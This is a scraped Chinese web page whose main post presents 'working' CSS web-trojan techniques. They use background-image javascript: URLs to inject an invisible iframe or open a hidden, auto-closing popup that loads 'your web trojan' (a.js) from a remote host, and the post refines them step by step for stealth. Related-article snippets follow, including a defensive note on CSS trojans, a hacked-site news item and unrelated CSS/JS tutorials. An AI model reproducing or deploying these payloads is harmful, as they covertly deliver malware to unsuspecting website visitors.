真正能用,还有点效果的CSS挂马代码的方法_安全相关

网上流行的:
body

background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body

background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:

body

background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script> 
a.js内容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>'); 
请指教. 

时间: 2024-09-22 13:11:28

真正能用,还有点效果的CSS挂马代码的方法_安全相关的相关文章

CSS挂马及相应防范方法

用来制作网页特效的CSS代码,也可以用来挂马.   随着Web2.0的普及,各种网页特效用得越来越多,这也给黑客一个可乘之机.他们发现,用来制作网页特效的CSS代码,也可以用来挂马.而比较讽刺的是,CSS挂马方式其实是从防范E挂马的CSS代码演变而来. 网站挂马的手段最初非常单一,但是随着Web2.0技术以及Blog.Wiki等广泛的应用,挂马也涌现出各种各样的技术,其中CSS挂马方式,可以说是Web2.0时代黑客的最爱.有许多非常著名的网站都被黑客用CSS挂马入侵过. 建议大家在点击陌生链接时

拉拉网最近还曾被黑客植入挂马页面

[赛迪网讯]2月14日情人节消息,今日有网友爆料称,女同交友网站拉拉网(www.15880.com)正在遭到黑客攻击,网站被迫暂停运营,至今无法正常访问.另据360网站安全检测平台之前的分析结果,拉拉网最近还曾被黑客植入挂马页面,对没有安全措施的访问者电脑也会造成一定风险. 据了解,拉拉网是一个面向华人的拉拉网站,提供LES交友.LES小说.形式婚姻.爱情诊所等多种服务.通过百度快照查看,该网站曾宣布已经拥有50万注册用户,是国内人气最高的女同交友网站之一. 目前拉拉网主页显示,"因机房被攻击暂

js实现运动logo图片效果及运动元素对象sportBox使用方法_图象特效

用CSS给图片打标的方法_经验交流

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-

你未必知道的JavaScript和CSS交互的5种方法

 网页中都有.js文件和.css文件,但这并不意味着CSS和js是独立不能交互的,下面与大家分享js与css交互的5种方法 随着浏览器不断的升级改进,CSS和JavaScript之间的界限越来越模糊.本来它们是负责着完全不同的功能,但最终,它们都属于网页前端技术,它们需要相互密切的合作.我们的网页中都有.js文件和.css文件,但这并不意味着CSS和js是独立不能交互的.下面要讲的这五种JavaScript和CSS共同合作的方法你也许未必知道!    用JavaScript获取伪元素(pseud

你未必知道的JavaScript和CSS交互的5种方法_javascript技巧

随着浏览器不断的升级改进,CSS和JavaScript之间的界限越来越模糊.本来它们是负责着完全不同的功能,但最终,它们都属于网页前端技术,它们需要相互密切的合作.我们的网页中都有.js文件和.css文件,但这并不意味着CSS和js是独立不能交互的.下面要讲的这五种JavaScript和CSS共同合作的方法你也许未必知道! 用JavaScript获取伪元素(pseudo-element)属性 大家都知道如何通过一个元素的style属性获取它的CSS样式值,但能获取伪元素(pseudo-eleme

JS实现标签页效果(配合css)_javascript技巧

实现的效果: 如上图所示为制作的标签页,我们想要实现的效果是当鼠标移到某一个标签的时候,在下面的内容区显示对应的内容,并且相应标签的颜色需要改变,如图中所示当前鼠标的位置在"标签1"上,则内容区域显示的内容为"我是内容1",并且"标签1"的颜色要比"标签2"和"标签3"深一些,同样鼠标移到"标签2"和"标签3"的时候显示"我是内容2"和"

JS+CSS实现带有碰撞缓冲效果的竖向导航条代码_javascript技巧

本文实例讲述了JS+CSS实现带有碰撞缓冲效果的竖向导航条代码.分享给大家供大家参考.具体如下: 这是一款碰撞缓冲效果的导航条,JavaScript妙味课堂奉献给大家的作品,很不错的竖向菜单,希望大家喜欢.所用技术是JS和CSS. 运行效果截图如下: 在线演示地址如下: http://demo.jb51.net/js/2015/js-css-pzxg-r-nav-style-codes/ 具体代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.

10个程序员最喜欢的 HTML和CSS 等在线代码编辑器

一般软件开发中必备的一样工具就是代码编辑器.传统的代码编辑器一般都是以软件安装包的形式安装到电脑里面,代码编辑保存后一般也是通过ftp或者svn等工具提交到服务器的(当然,像.NET开发中Microsoft Visual Studio这样强大的集成工具另说了.). 在 实际的项目开发中这样的方式也是挺便捷的.但是,随着各种云服务的兴起,云存储时代几乎已经是大势所趋了.个人或者小公司搭建一个类似的服务自然代价不 菲.这时候利用一些现有的在线代码编辑器,可以为你的项目进度和日常学习带来很大的帮助.特